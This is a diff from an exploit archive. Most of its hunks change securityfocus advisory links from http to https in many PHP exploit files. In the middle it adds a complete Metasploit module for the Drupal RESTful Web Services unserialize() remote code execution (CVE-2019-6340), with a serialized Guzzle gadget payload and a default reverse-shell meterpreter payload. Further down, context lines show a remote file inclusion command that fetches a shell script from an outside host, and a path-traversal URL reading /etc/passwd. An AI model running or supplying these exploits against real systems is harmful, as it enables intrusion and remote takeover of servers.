@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22764/info +source: https://www.securityfocus.com/bid/22764/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29693.txt b/exploits/php/dos/29693.txt index afb47a7a6..5a967c31c 100644 --- a/exploits/php/dos/29693.txt +++ b/exploits/php/dos/29693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22766/info +source: https://www.securityfocus.com/bid/22766/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29823.c b/exploits/php/dos/29823.c index 2884a761c..38dbf34a0 100644 --- a/exploits/php/dos/29823.c +++ b/exploits/php/dos/29823.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23357/info +// source: https://www.securityfocus.com/bid/23357/info PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun. diff --git a/exploits/php/dos/30401.php b/exploits/php/dos/30401.php index 739bb1120..e21a2b5d4 100644 --- a/exploits/php/dos/30401.php +++ b/exploits/php/dos/30401.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25079/info +source: https://www.securityfocus.com/bid/25079/info T1lib is prone to a buffer-overflow vulnerability because the library fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. diff --git a/exploits/php/dos/30753.txt b/exploits/php/dos/30753.txt index 99dd80740..4d6d83c06 100644 --- a/exploits/php/dos/30753.txt +++ b/exploits/php/dos/30753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26410/info +source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. 
diff --git a/exploits/php/dos/30760.txt b/exploits/php/dos/30760.txt index 3d3600bbc..3e29d0c0d 100644 --- a/exploits/php/dos/30760.txt +++ b/exploits/php/dos/30760.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26428/info +source: https://www.securityfocus.com/bid/26428/info PHP is prone to multiple denial-of-service vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/php/dos/32715.php b/exploits/php/dos/32715.php index c2b90fc6b..9325dffad 100644 --- a/exploits/php/dos/32715.php +++ b/exploits/php/dos/32715.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33216/info +source: https://www.securityfocus.com/bid/33216/info PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. diff --git a/exploits/php/dos/32769.php b/exploits/php/dos/32769.php index 3abb776bb..26a5fba2d 100644 --- a/exploits/php/dos/32769.php +++ b/exploits/php/dos/32769.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33542/info +source: https://www.securityfocus.com/bid/33542/info PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations. diff --git a/exploits/php/dos/33625.php b/exploits/php/dos/33625.php index 9bcae26bf..63b5ca620 100644 --- a/exploits/php/dos/33625.php +++ b/exploits/php/dos/33625.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38182/info +source: https://www.securityfocus.com/bid/38182/info PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions. diff --git a/exploits/php/dos/33677.txt b/exploits/php/dos/33677.txt index e43b030cd..76f472146 100644 --- a/exploits/php/dos/33677.txt +++ b/exploits/php/dos/33677.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38430/info +source: https://www.securityfocus.com/bid/38430/info PHP is prone to a security vulnerability that affects LCG (Linear Congruential) entropy. diff --git a/exploits/php/dos/33755.php b/exploits/php/dos/33755.php index 54de0f55e..47cd9353a 100644 --- a/exploits/php/dos/33755.php +++ b/exploits/php/dos/33755.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38708/info +source: https://www.securityfocus.com/bid/38708/info PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests. diff --git a/exploits/php/dos/34505.txt b/exploits/php/dos/34505.txt index bb8f5ebc2..9af28356d 100644 --- a/exploits/php/dos/34505.txt +++ b/exploits/php/dos/34505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42598/info +source: https://www.securityfocus.com/bid/42598/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/php/dos/35164.php b/exploits/php/dos/35164.php index 3ae95b838..4305ff46a 100644 --- a/exploits/php/dos/35164.php +++ b/exploits/php/dos/35164.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45668/info +source: https://www.securityfocus.com/bid/45668/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/35354.txt b/exploits/php/dos/35354.txt index cf2f03be2..4bb244410 100644 --- a/exploits/php/dos/35354.txt +++ b/exploits/php/dos/35354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46429/info +source: https://www.securityfocus.com/bid/46429/info PHP is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference. diff --git a/exploits/php/dos/35483.txt b/exploits/php/dos/35483.txt index 0ca277417..e2978eaf5 100644 --- a/exploits/php/dos/35483.txt +++ b/exploits/php/dos/35483.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46968/info +source: https://www.securityfocus.com/bid/46968/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension. diff --git a/exploits/php/dos/35484.php b/exploits/php/dos/35484.php index de02232cc..0624af2e5 100644 --- a/exploits/php/dos/35484.php +++ b/exploits/php/dos/35484.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46969/info +source: https://www.securityfocus.com/bid/46969/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. diff --git a/exploits/php/dos/35485.php b/exploits/php/dos/35485.php index fd6d278f0..6ce742d1c 100644 --- a/exploits/php/dos/35485.php +++ b/exploits/php/dos/35485.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46975/info +source: https://www.securityfocus.com/bid/46975/info PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension. diff --git a/exploits/php/dos/35486.php b/exploits/php/dos/35486.php index d76a50cc7..66d7049f2 100644 --- a/exploits/php/dos/35486.php +++ b/exploits/php/dos/35486.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46977/info +source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. diff --git a/exploits/php/dos/35487.php b/exploits/php/dos/35487.php index bf769380d..f58b66856 100644 --- a/exploits/php/dos/35487.php +++ b/exploits/php/dos/35487.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46977/info +source: https://www.securityfocus.com/bid/46977/info PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension. diff --git a/exploits/php/dos/36070.txt b/exploits/php/dos/36070.txt index d5f993862..e62a7fb89 100644 --- a/exploits/php/dos/36070.txt +++ b/exploits/php/dos/36070.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49249/info +source: https://www.securityfocus.com/bid/49249/info PHP is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. diff --git a/exploits/php/dos/36682.php b/exploits/php/dos/36682.php index 7cfd84680..5d048e5d9 100644 --- a/exploits/php/dos/36682.php +++ b/exploits/php/dos/36682.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51952/info +source: https://www.securityfocus.com/bid/51952/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/36789.php b/exploits/php/dos/36789.php index a724988f5..44c87da58 100644 --- a/exploits/php/dos/36789.php +++ b/exploits/php/dos/36789.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52043/info +source: https://www.securityfocus.com/bid/52043/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/37566.php b/exploits/php/dos/37566.php index 78c004bb1..34ea89434 100644 --- a/exploits/php/dos/37566.php +++ b/exploits/php/dos/37566.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54777/info +source: https://www.securityfocus.com/bid/54777/info PHP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/39091.pl b/exploits/php/dos/39091.pl index fb6f1cf86..c3918106a 100755 --- a/exploits/php/dos/39091.pl +++ b/exploits/php/dos/39091.pl @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/65470/info +source: https://www.securityfocus.com/bid/65470/info WHMCS is prone to a denial-of-service vulnerability. diff --git a/exploits/php/dos/39092.pl b/exploits/php/dos/39092.pl index ba4779533..2cf8fb1b6 100755 --- a/exploits/php/dos/39092.pl +++ b/exploits/php/dos/39092.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65481/info +source: https://www.securityfocus.com/bid/65481/info phpBB is prone to a remote denial-of-service vulnerability. 
diff --git a/exploits/php/dos/39095.pl b/exploits/php/dos/39095.pl index 4d18b770b..03075736f 100755 --- a/exploits/php/dos/39095.pl +++ b/exploits/php/dos/39095.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65545/info +source: https://www.securityfocus.com/bid/65545/info MyBB is prone to a remote denial-of-service vulnerability. diff --git a/exploits/php/local/10296.txt b/exploits/php/local/10296.txt index c91ad8803..ccedd7fe9 100644 --- a/exploits/php/local/10296.txt +++ b/exploits/php/local/10296.txt @@ -20,7 +20,7 @@ Debian Linux 5.0 alpha Debian Linux 5.0 References: -http://www.securityfocus.com/bid/36009/info +https://www.securityfocus.com/bid/36009/info http://securityreason.com/achievement_securityalert/65 Description: diff --git a/exploits/php/local/20985.php b/exploits/php/local/20985.php index 6eac1c7e3..3e55bd748 100644 --- a/exploits/php/local/20985.php +++ b/exploits/php/local/20985.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2954/info +source: https://www.securityfocus.com/bid/2954/info PHP is the Personal HomePage development toolkit, distributed by the PHP.net, and maintained by the PHP Development Team in public domain. diff --git a/exploits/php/local/21347.php b/exploits/php/local/21347.php index 3c7c0e393..b7074d65e 100644 --- a/exploits/php/local/21347.php +++ b/exploits/php/local/21347.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4325/info +source: https://www.securityfocus.com/bid/4325/info PHP is a server side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix based operating systems. It is commonly used for web development, and is very widely deployed. diff --git a/exploits/php/local/22911.php b/exploits/php/local/22911.php index 28c5ffb88..ae0e69765 100644 --- a/exploits/php/local/22911.php +++ b/exploits/php/local/22911.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8201/info +source: https://www.securityfocus.com/bid/8201/info PHP is prone to an issue that may allow programs to bypass Safe Mode by calling external files in restricted directories using include() and require(). diff --git a/exploits/php/local/23022.c b/exploits/php/local/23022.c index 673d2df60..c3c4a54be 100644 --- a/exploits/php/local/23022.c +++ b/exploits/php/local/23022.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8405/info +// source: https://www.securityfocus.com/bid/8405/info A vulnerability has been reported to present itself in the dlopen() function contained in the PHP source. The issue occurs when PHP is used in conjunction with the Apache web server. A local attacker may exploit this issue to gain unauthorized access to potentially sensitive information. diff --git a/exploits/php/local/23023.c b/exploits/php/local/23023.c index 77f67d60e..8cfb8383c 100644 --- a/exploits/php/local/23023.c +++ b/exploits/php/local/23023.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8405/info +// source: https://www.securityfocus.com/bid/8405/info A vulnerability has been reported to present itself in the dlopen() function contained in the PHP source. The issue occurs when PHP is used in conjunction with the Apache web server. A local attacker may exploit this issue to gain unauthorized access to potentially sensitive information. diff --git a/exploits/php/local/24173.txt b/exploits/php/local/24173.txt index 78d8d3986..80ce7a37c 100644 --- a/exploits/php/local/24173.txt +++ b/exploits/php/local/24173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10471/info +source: https://www.securityfocus.com/bid/10471/info PHP is reportedly prone to a command execution vulnerability in its shell escape functions. This issue is due to a failure of PHP to properly sanitize function arguments. 
diff --git a/exploits/php/local/25040.php b/exploits/php/local/25040.php index 96f3ccc3e..c2c3d7f1e 100644 --- a/exploits/php/local/25040.php +++ b/exploits/php/local/25040.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12045/info +source: https://www.securityfocus.com/bid/12045/info PHP shared memory module (shmop) is reported prone to an integer handling vulnerability. The issue exists in the PHP_FUNCTION(shmop_write) function and is as a result of a lack of sufficient sanitization performed on 'offset' data. diff --git a/exploits/php/local/26352.php b/exploits/php/local/26352.php index 7817e7840..4ea3fcfca 100644 --- a/exploits/php/local/26352.php +++ b/exploits/php/local/26352.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15119/info +source: https://www.securityfocus.com/bid/15119/info PHP is prone to multiple vulnerabilities that permit an attacker to bypass the 'safedir' directory restriction. diff --git a/exploits/php/local/27334.txt b/exploits/php/local/27334.txt index 09c0b1e00..9b106455f 100644 --- a/exploits/php/local/27334.txt +++ b/exploits/php/local/27334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16878/info +source: https://www.securityfocus.com/bid/16878/info PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. diff --git a/exploits/php/local/27335.txt b/exploits/php/local/27335.txt index 6e5cdff77..c0a6deb0c 100644 --- a/exploits/php/local/27335.txt +++ b/exploits/php/local/27335.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16878/info +source: https://www.securityfocus.com/bid/16878/info PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. diff --git a/exploits/php/local/28504.php b/exploits/php/local/28504.php index 1b79e89ab..ecef41536 100644 --- a/exploits/php/local/28504.php +++ b/exploits/php/local/28504.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19933/info +source: https://www.securityfocus.com/bid/19933/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations. diff --git a/exploits/php/local/29239.txt b/exploits/php/local/29239.txt index 88b25de48..f3a2d803a 100644 --- a/exploits/php/local/29239.txt +++ b/exploits/php/local/29239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21508/info +source: https://www.securityfocus.com/bid/21508/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations. diff --git a/exploits/php/local/29528.txt b/exploits/php/local/29528.txt index 80a539d40..3e6b8ffea 100644 --- a/exploits/php/local/29528.txt +++ b/exploits/php/local/29528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22261/info +source: https://www.securityfocus.com/bid/22261/info PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible. diff --git a/exploits/php/local/29712.txt b/exploits/php/local/29712.txt index dff7a4ce5..7d2deea5b 100644 
--- a/exploits/php/local/29712.txt +++ b/exploits/php/local/29712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22802/info +source: https://www.securityfocus.com/bid/22802/info The Zend Platform is prone to an issue that may let local attackers modify the PHP configuration file ('php.ini'). This issue occurs because the application is installed with an 'ini_modifier' program that may be executed by local users and will bypass the authentication that is required by the application to change the configuration file. diff --git a/exploits/php/local/29801.php b/exploits/php/local/29801.php index 20e8fac0b..381d07e0c 100644 --- a/exploits/php/local/29801.php +++ b/exploits/php/local/29801.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23183/info +source: https://www.securityfocus.com/bid/23183/info PHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error. diff --git a/exploits/php/local/29804.php b/exploits/php/local/29804.php index cfe03d1fa..fa7226227 100644 --- a/exploits/php/local/29804.php +++ b/exploits/php/local/29804.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23202/info +source: https://www.securityfocus.com/bid/23202/info PHP is prone to an information-disclosure vulnerability due to a design error. diff --git a/exploits/php/local/31937.txt b/exploits/php/local/31937.txt index fbc8c023e..70bbdddef 100644 --- a/exploits/php/local/31937.txt +++ b/exploits/php/local/31937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29796/info +source: https://www.securityfocus.com/bid/29796/info PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. diff --git a/exploits/php/local/32343.php b/exploits/php/local/32343.php index 13190b716..9cb4f0fc4 100644 --- a/exploits/php/local/32343.php +++ b/exploits/php/local/32343.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31064/info +source: https://www.securityfocus.com/bid/31064/info PHP is prone to 'safe_mode_exec_dir' and 'open_basedir' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to execute arbitrary code. diff --git a/exploits/php/local/32693.php b/exploits/php/local/32693.php index 99bd41eda..5e71b8e5a 100644 --- a/exploits/php/local/32693.php +++ b/exploits/php/local/32693.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33073/info +source: https://www.securityfocus.com/bid/33073/info suPHP is prone to a 'safe_mode' restriction-bypass vulnerability. diff --git a/exploits/php/local/32901.php b/exploits/php/local/32901.php index fb5c50e1c..12bf967a9 100644 --- a/exploits/php/local/32901.php +++ b/exploits/php/local/32901.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34475/info +source: https://www.securityfocus.com/bid/34475/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations. diff --git a/exploits/php/local/33161.php b/exploits/php/local/33161.php index 166902c49..838a46eb7 100644 --- a/exploits/php/local/33161.php +++ b/exploits/php/local/33161.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36007/info +source: https://www.securityfocus.com/bid/36007/info PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error. diff --git a/exploits/php/remote/19553.txt b/exploits/php/remote/19553.txt index dec469549..21708d664 100644 --- a/exploits/php/remote/19553.txt +++ b/exploits/php/remote/19553.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/713/info +source: https://www.securityfocus.com/bid/713/info The PHP/FI package which was originally written by Rasmus Lerdorf is an is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. diff --git a/exploits/php/remote/19708.php b/exploits/php/remote/19708.php index 6fb0e070d..b4b67b1b2 100644 --- a/exploits/php/remote/19708.php +++ b/exploits/php/remote/19708.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/911/info +source: https://www.securityfocus.com/bid/911/info PHP Version 3.0 is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. diff --git a/exploits/php/remote/20286.c b/exploits/php/remote/20286.c index 6ded9c021..d7cdcd7a8 100644 --- a/exploits/php/remote/20286.c +++ b/exploits/php/remote/20286.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1786/info +// source: https://www.securityfocus.com/bid/1786/info PHP is a scripting language designed for CGI applications that is used on many websites. There exists a remotely exploitable format string vulnerability in all versions of PHP below PHP 4.0.3. diff --git a/exploits/php/remote/21155.txt b/exploits/php/remote/21155.txt index a3de7ebcb..aea4bb0ed 100644 --- a/exploits/php/remote/21155.txt +++ b/exploits/php/remote/21155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3552/info +source: https://www.securityfocus.com/bid/3552/info Network Tool is a PHPNuke addon, written and maintained by Rick Fournier. It is designed to offer network features such as nmap, traceroute, and ping from a web interface. 
diff --git a/exploits/php/remote/21264.php b/exploits/php/remote/21264.php index 41218bbaa..b9b28867a 100644 --- a/exploits/php/remote/21264.php +++ b/exploits/php/remote/21264.php 
@@ -1,6 +1,6 @@ 'Drupal RESTful Web Services unserialize() RCE', + 'Description' => %q{ + This module exploits a PHP unserialize() vulnerability in Drupal RESTful + Web Services by sending a crafted request to the /node REST endpoint. + + As per SA-CORE-2019-003, the initial remediation was to disable POST, + PATCH, and PUT, but Ambionics discovered that GET was also vulnerable + (albeit cached). Cached nodes can be exploited only once. + + Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of + this alternate vector. + + Drupal < 8.5.11 and < 8.6.10 are vulnerable. + }, + 'Author' => [ + 'Jasper Mattsson', # Discovery + 'Charles Fol', # PoC + 'Rotem Reiss', # Module + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2019-6340'], + ['URL', 'https://www.drupal.org/sa-core-2019-003'], + ['URL', 'https://www.drupal.org/psa-2019-02-22'], + ['URL', 'https://www.ambionics.io/blog/drupal8-rce'], + ['URL', 'https://github.com/ambionics/phpggc'], + ['URL', 'https://twitter.com/jcran/status/1099206271901798400'] + ], + 'DisclosureDate' => '2019-02-20', + 'License' => MSF_LICENSE, + 'Platform' => ['php', 'unix'], + 'Arch' => [ARCH_PHP, ARCH_CMD], + 'Privileged' => false, + 'Targets' => [ + ['PHP In-Memory', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_memory, + 'Payload' => {'BadChars' => "'"}, + 'DefaultOptions' => { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + } + ], + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/generic', + 'CMD' => 'id' + } + ] + ], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliablity' => [UNRELIABLE_SESSION], # When using the GET method + 'AKA' => ['SA-CORE-2019-003'] + } + )) + + register_options([ + OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST', + ['GET', 'POST', 'PATCH', 'PUT']]), + OptInt.new('NODE', [false, 'Node ID to target with GET method', 
1]) + ]) + + register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + end + + def check + checkcode = CheckCode::Unknown + + version = drupal_version + + unless version + vprint_error('Could not determine Drupal version') + return checkcode + end + + if version.to_s !~ /^8\b/ + vprint_error("Drupal #{version} is not supported") + return CheckCode::Safe + end + + vprint_status("Drupal #{version} targeted at #{full_uri}") + checkcode = CheckCode::Detected + + changelog = drupal_changelog(version) + + unless changelog + vprint_error('Could not determine Drupal patch level') + return checkcode + end + + case drupal_patch(changelog, 'SA-CORE-2019-003') + when nil + vprint_warning('CHANGELOG.txt no longer contains patch level') + when true + vprint_warning('Drupal appears patched in CHANGELOG.txt') + checkcode = CheckCode::Safe + when false + vprint_good('Drupal appears unpatched in CHANGELOG.txt') + checkcode = CheckCode::Appears + end + + # Any further with GET and we risk caching the targeted node + return checkcode if meth == 'GET' + + # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable + token = Rex::Text.rand_text_alphanumeric(8..42) + res = execute_command("echo #{token}") + + return checkcode unless res + + if res.body.include?(token) + vprint_good('Drupal is vulnerable to code execution') + checkcode = CheckCode::Vulnerable + end + + checkcode + end + + def exploit + if [CheckCode::Safe, CheckCode::Unknown].include?(check) + if datastore['ForceExploit'] + print_warning('ForceExploit set! 
Exploiting anyway!') + else + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + end + + if datastore['PAYLOAD'] == 'cmd/unix/generic' + print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') + # XXX: Naughty datastore modification + datastore['DUMP_OUTPUT'] = true + end + + case target['Type'] + when :php_memory + # XXX: This will spawn a *very* obvious process + execute_command("php -r '#{payload.encoded}'") + when :unix_memory + execute_command(payload.encoded) + end + end + + def execute_command(cmd, opts = {}) + vprint_status("Executing with system(): #{cmd}") + + # https://en.wikipedia.org/wiki/Hypertext_Application_Language + hal_json = JSON.pretty_generate( + 'link' => [ + 'value' => 'link', + 'options' => phpggc_payload(cmd) + ], + '_links' => { + 'type' => { + 'href' => vhost_uri + } + } + ) + + print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}") + + res = send_request_cgi({ + 'method' => meth, + 'uri' => node_uri, + 'ctype' => 'application/hal+json', + 'vars_get' => {'_format' => 'hal_json'}, + 'data' => hal_json + }, 3.5) + + return unless res + + case res.code + # 401 isn't actually a failure when using the POST method + when 200, 401 + print_line(res.body) if datastore['DUMP_OUTPUT'] + if meth == 'GET' + print_warning('If you did not get code execution, try a new node ID') + end + when 404 + print_error("#{node_uri} not found") + when 405 + print_error("#{meth} method not allowed") + when 422 + print_error('VHOST may need to be set') + when 406 + print_error('Web Services may not be enabled') + else + print_error("Unexpected reply: #{res.inspect}") + end + + res + end + + # phpggc Guzzle/RCE1 system id + def phpggc_payload(cmd) + ( + # http://www.phpinternalsbook.com/classes_objects/serialization.html + <<~EOF + O:24:"GuzzleHttp\\Psr7\\FnStream":2:{ + s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{ + s:5:"close";a:2:{ + i:0;O:23:"GuzzleHttp\\HandlerStack":3:{ + 
s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler"; + s:cmd_len:"cmd"; + s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack"; + a:1:{i:0;a:1:{i:0;s:6:"system";}} + s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached"; + b:0; + } + i:1;s:7:"resolve"; + } + } + s:9:"_fn_close";a:2:{ + i:0;r:4; + i:1;s:7:"resolve"; + } + } + EOF + ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd) + end + + def meth + datastore['METHOD'] || 'POST' + end + + def node + datastore['NODE'] || 1 + end + + def node_uri + if meth == 'GET' + normalize_uri(target_uri.path, '/node', node) + else + normalize_uri(target_uri.path, '/node') + end + end + + def vhost_uri + full_uri( + normalize_uri(target_uri.path, '/rest/type/shortcut/default'), + vhost_uri: true + ) + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/10002.txt b/exploits/php/webapps/10002.txt index 709834fd4..ef432eeb5 100644 --- a/exploits/php/webapps/10002.txt +++ b/exploits/php/webapps/10002.txt @@ -73,7 +73,7 @@ In the UTF-8 fork the password cookie is salted with a prefix of 'FqZm$()G_~<' a A XSS bug was reported by DeltahackingTEAM on 2008-11-07 which I am unable to reproduce. The details are: Exploit: http://www.example.com/register.php?config_skin=../../../../etc/passwd%00 -Link: http://www.securityfocus.com/bid/32142/info +Link: https://www.securityfocus.com/bid/32142/info UTF-8 Cute News has not been reviewed except to check whether if it is effected by vulnerabilities found in Cute News 1.4.6. diff --git a/exploits/php/webapps/10181.txt b/exploits/php/webapps/10181.txt index 355394e3c..a5dfbbe93 100644 --- a/exploits/php/webapps/10181.txt +++ b/exploits/php/webapps/10181.txt 
@@ -6,7 +6,7 @@ # [+] Method : Remote File Inclusion # [+] Location : INDONESIA # [~] Notes : I know this is an old bugs, but i just write this exploit under perl module. -# [~] Refrence : http://www.securityfocus.com/bid/13965 +# [~] Refrence : https://www.securityfocus.com/bid/13965 # [~] How To : # perl tux.pl cmd # perl tux.pl http://server/path/ http://www.indonesiancoder.org/shell.txt cmd diff --git a/exploits/php/webapps/1050.pl b/exploits/php/webapps/1050.pl index 637fc0b1e..e4e6824b3 100755 --- a/exploits/php/webapps/1050.pl +++ b/exploits/php/webapps/1050.pl @@ -9,7 +9,7 @@ # # # # # + Discovered By: GulfTech # -# + Advisory: http://www.securityfocus.com/bid/13967 # +# + Advisory: https://www.securityfocus.com/bid/13967 # #Vulnerable: PHP Arena paFileDB 1.1.3 and Older # ###################################################################################### # GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke # diff --git a/exploits/php/webapps/11183.txt b/exploits/php/webapps/11183.txt index 5e73d3011..0f65bfed0 100644 --- a/exploits/php/webapps/11183.txt +++ b/exploits/php/webapps/11183.txt @@ -1,7 +1,7 @@ 1.Title :Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System. Discovered by: Prashant Khandelwal (clickprashant@gmail.com) Submitted :Jan-15-2010 - Bugtraq id : http://www.securityfocus.com/bid/37824 + Bugtraq id : https://www.securityfocus.com/bid/37824 Secunia : http://secunia.com/advisories/38201/ 2.Vulnerability Information diff --git a/exploits/php/webapps/15174.txt b/exploits/php/webapps/15174.txt index ac3da4684..0777094ff 100644 --- a/exploits/php/webapps/15174.txt +++ b/exploits/php/webapps/15174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43507/info +source: https://www.securityfocus.com/bid/43507/info Tiki Wiki CMS Groupware is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
